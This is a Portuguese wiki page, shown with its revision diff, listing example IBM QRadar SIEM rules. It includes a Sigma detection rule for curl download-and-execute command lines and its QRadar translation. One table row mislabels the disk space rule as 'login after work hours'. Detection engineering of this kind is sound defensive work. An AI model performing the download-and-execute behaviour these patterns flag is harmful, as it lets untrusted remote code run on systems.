IBM QRadar: Rules: Difference between revisions
| Line 27: | Line 27: | ||
'''and''' when an event were detected by on or more of '''Netgate pfSense'''</br> | '''and''' when an event were detected by on or more of '''Netgate pfSense'''</br> | ||
'''and''' when the event QID is one of the following '''(11xx) pfSense - Login on console''' | '''and''' when the event QID is one of the following '''(11xx) pfSense - Login on console''' | ||
|| | |||
Login após horário de trabalho | |||
|- | |||
| | |||
Apply '''Disk Space Alert'''</br> | |||
'''and''' when the event QID is one of the following '''(38750076) Disk Sentry Disk Usage Exceed Warn Threshold''','''(38750038) Disk sentry disk usage exceeded threshold''' | |||
|| | || | ||
Login após horário de trabalho | Login após horário de trabalho | ||
Revision as of 18:40, 31 January 2025
Uma Rule (regra) é um grupo de testes que podem desencadear uma ação se condições específicas forem atendidas.
Artigos
Exemplos
| Rule | Description |
|---|---|
|
Apply Potential Windows Enumeration Detected |
Comandos que hackers pegam informações em servidores MS Windows |
|
Apply Login After Work Hours |
Login após horário de trabalho |
|
Apply Disk Space Alert |
Login após horário de trabalho |
| . | . |
Exemplo: (Github) Sigma - Curl Download And Execute Combination
title: Curl Download And Execute Combination
...
selection:
CommandLine|contains|windash: ' -c '
CommandLine|contains|all:
- 'curl '
- 'http'
- '-o'
- '&'
condition: selection
And in IBM QRadar Rule:
Apply Curl Download And Execute Combination and when an event matches any of the following BB: Windows Endpoint Events and when the event matches Event ID is any of 4688 and when the event matches Command (custom) contains all of [/c or curl or http or -o or &]